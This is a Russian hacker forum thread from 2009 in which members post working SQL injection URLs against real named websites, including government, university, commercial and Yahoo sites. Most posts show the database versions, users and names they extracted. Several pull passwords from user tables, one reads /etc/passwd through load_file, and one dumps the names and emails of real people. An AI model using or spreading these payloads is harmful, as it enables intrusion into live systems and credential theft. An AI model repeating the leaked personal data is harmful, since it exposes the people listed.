SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://www.youthsports.gov.mv/view_main_story.php?recordID=1+union+select+1,2,aes_decrypt(aes_encrypt(concat(0x2,version(),user(),database()),0x71),0x71),4,5,6/*

    [email protected]


    http://www.hb-show.de/index.php?page_id=63+union+select+concat_ws(0x3,version(),user(),database())


    4.1.22 10002_sismedia@localhost 10002_sismedia
     
    1 person likes this.
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://gitarre.ru/index.php?mode=pages&id=-36+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8--

    [email protected]:u57821_gitarre:5.0.67-log
     
    _________________________
    1 person likes this.
  3. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.kharkiv.com/index.php?s=1&bt=1&db=1&cl=1&cat_id=65%20and%201=2%20union%20select%201,version(),3,4,5+--+&page=1
    4.0.27
     
    3 people like this.
  4. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://propel.ru/forum/see.php?id=1041+union+select+1,2,concat(0x2,version(),user(),database()),4,5,6,7,8,9,10,11+limit+1,1

    5.0.26-logpropeltu_propel@localhostpropeltu_propel
     
    1 person likes this.
  5. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.rosexport.biz/catalog.php?ID=-1'+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8+--+
    4.1.11-Debian_4sarge5-log
     
    1 person likes this.
  6. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://www.touch-deco.fr/fiche-produit.php?id=65+union+select+1,concat_ws(0x2,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
    5.0.48 touch@localhost touch
     
  7. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.blumenbar.de/buch.php?id=-3+union+select+1,concat(version(),0x2f2f2f,user(),0x2f2f2f,database()),group_concat(table_name+separator+0x0a),4,5,6,7+from+information_schema.tables+--+
     
    2 people like this.
  8. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://www.ifestival.fr/article.php?id=337+union+select+1,2,3,4,concat_ws(0x2a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18

    5.0.22 jbfontana @localhost frequencb
     
    2 people like this.
  9. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://www.wheelingwv.gov/forbusinesses.php?fid=-1+union+all+select+1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6
    database: cityofwheeling
    user: cowwv@localhost
    version: 4.1.22

    Code:
    http://www.sandiego.edu/EPIC/news/frontnews.php?id=null+union+select+1,version(),3,4,5,6--

    Антибоян не работает, не пинайте если что:(

    jokester: гугл зато работает
     
    #10449 [underwater], 25 Aug 2009
    Last edited by a moderator: 25 Aug 2009
    2 people like this.
  10. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.stengazeta.net/author.html?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(concat(id,'ll',fname,'ll',name,'ll',email,'ll',homepage)+separator+0x0a),14+from+persons/*
    1llАнабарllСергей[email protected]
    2llЮзефовичllГалина[email protected]
    3llГодерllДина[email protected]
    4llСоринllАлександрllll
    5llРубинштейнllЛевllll
    6llАлексееваllНатальяllll
    7llАфанасьевllАлексейllll
    8llБермантllЕкатеринаllll
    9llБлантllМаксимllll
    10llБыковскийllЕгор[email protected]
    11llГессенllМаша[email protected]
    12llГладильщиковllЮрийllll
    13llГоловинскаяllИрина[email protected]
    14llГринбергllМаркllll
    15llЖуковllБорис[email protected]
    16llЗмеулllАлександрllll
    17llИгумноваllЕленаllll
    18llКорецкийllВасилий[email protected]
    19llКрученицкаяllНадеждаllll
    22llЛивергантllАлександра[email protected]
    23llЛебедеваllЮлияllll
    24llПановllАлександрllll
    25llСедовllЯрославllll
    27llСолодовникllСветлана[email protected]
    28llСтефановичllНатальяllll
    29llСафроноваllТатьянаllll
    30llСоколовllНикита[email protected]
    31llУховllДмитрийllll
    32llРубинштейнllМария[email protected]
    33llУвароваllМарияllll
    35llЩербаковllАлександрllll
    36llЯринllАлександрllll
    37llДубинllБорисllll
    38llЛупо
     
    3 people like this.
  11. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://www.lncygt.gov.cn/list.php?cid=1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9+limit+1,1
    4.0.21-standard-log:[email protected]:t101
     
    5 people like this.
  12. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://www.dpe.edu.mv/dpe/news/view.php?news_id=0%20union%20all%20select%201,2,unhex%28hex%28@@version%29%29,4,5,6,7--
    Code:
    http://www.calendar.ilstu.edu/detail.taf?_function=detail&EventCategories_uid1=41&event_uid2=-1)+UNION+ALL+SELECT+1,2,3,SYSTEM_USER,@@version,6,7,8,9,10, @@SERVERNAME,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,user,41,user,43,user,45,user,46,47,48,49,50,51----
    Code:
    http://www.orienttouch.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers--
    Code:
    http://www.miss-internet.cz/content.php?pid=4&id=-72%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3A3A,%20version(),database(),user()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
    Code:
    http://www.sdp-usk.ba/news.php?id=-1+union+all+select+1,concat(user_level,0x3a,username,0x3a,user_password,0x3a,user_email),null,null,5,null,7,8+from+phpbb_users--
    Code:
    http://bangkhunthianjoggingclub.com/webboard_ans.php?id=1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/*
     
    #10452 [underwater], 25 Aug 2009
    Last edited by a moderator: 25 Aug 2009
    2 people like this.
  13. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Банк времени)))

    Time Banking UK
    Code:
    Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) 
     
    5 people like this.
  14. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://www.briancable.com/view.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18-
    assa.edu.au
    Code:
    http://www.assa.edu.au/programs/policy/paper.php?id=-1+UNION+ALL+SELECT+1,2,concat(email,0x3a,password),4,5,6,7,8,9,10+FROM+people
    Code:
    http://www.niburu.nl/viewinstelling.php?id=-14+union+all+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+FROM+mysql.user--
    Load_file:
    Code:
    http://www.niburu.nl/viewinstelling.php?id=-14+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9--
     
    #10454 [underwater], 25 Aug 2009
    Last edited by a moderator: 25 Aug 2009
    2 people like this.
  15. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://www.china-deaf.cn/vwd.php?id=1+union+select+1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8+limit+1,1
    4.0.27-log ztqlongxiao@localhost ztq_longxiao
     
    1 person likes this.
  16. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.tacheproduction.org/site/pages/expos.php?sup=-5+union+select+1,concat_ws(0x3a,id,login,pass),3,4,5+from+user/*
     
    #10456 DrAssault, 26 Aug 2009
    Last edited by a moderator: 26 Aug 2009
    3 people like this.
  17. diGriz

    diGriz Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    138
    Likes Received:
    82
    Reputations:
    6
    Code:
    http://tonitomov.com/products.php?id=-20+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
    tonitomo_sapove:5.0.81-community-log:tonitomo_tonitom@localhost

    Code:
    http://paintdecordiy.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7--
    d60204512:5.0.77-log:u70215489@cgihost
     
    3 people like this.
  18. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Вторая скуль на yahoo и ещё не последняя. имхо))

    Так как мою тему снесли, выложу сюда:

    PR: 5

    Code:
    http://suggestions.yahoo.com/detail/?prop=realestate&fid=158954+and+1=0+union+select+0,0,0,unhex(hex(concat_ws(0x3a,version(),database()))),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--

    Version: 4.1.23-Yahoo-SMP-log
    Database: userfeedback
     
    #10458 mr.gr33n, 26 Aug 2009
    Last edited: 27 Aug 2009
    4 people like this.
  19. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://www.nbtb.gov.cn/homepage/view.php?id=3053&catid=2+union+select+1,2,concat(0x2,version(),user(),database())+limit+1,1
    4.1.21-standardnbtb@localhostnbtb
     
    1 person likes this.
  20. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.scaa.us/article.php?id=-4%20union%20select%201,2,3,4,5,concat_ws(0x3a3a3a,username,password)%20from%20users
     
Thread Status:
Not open for further replies.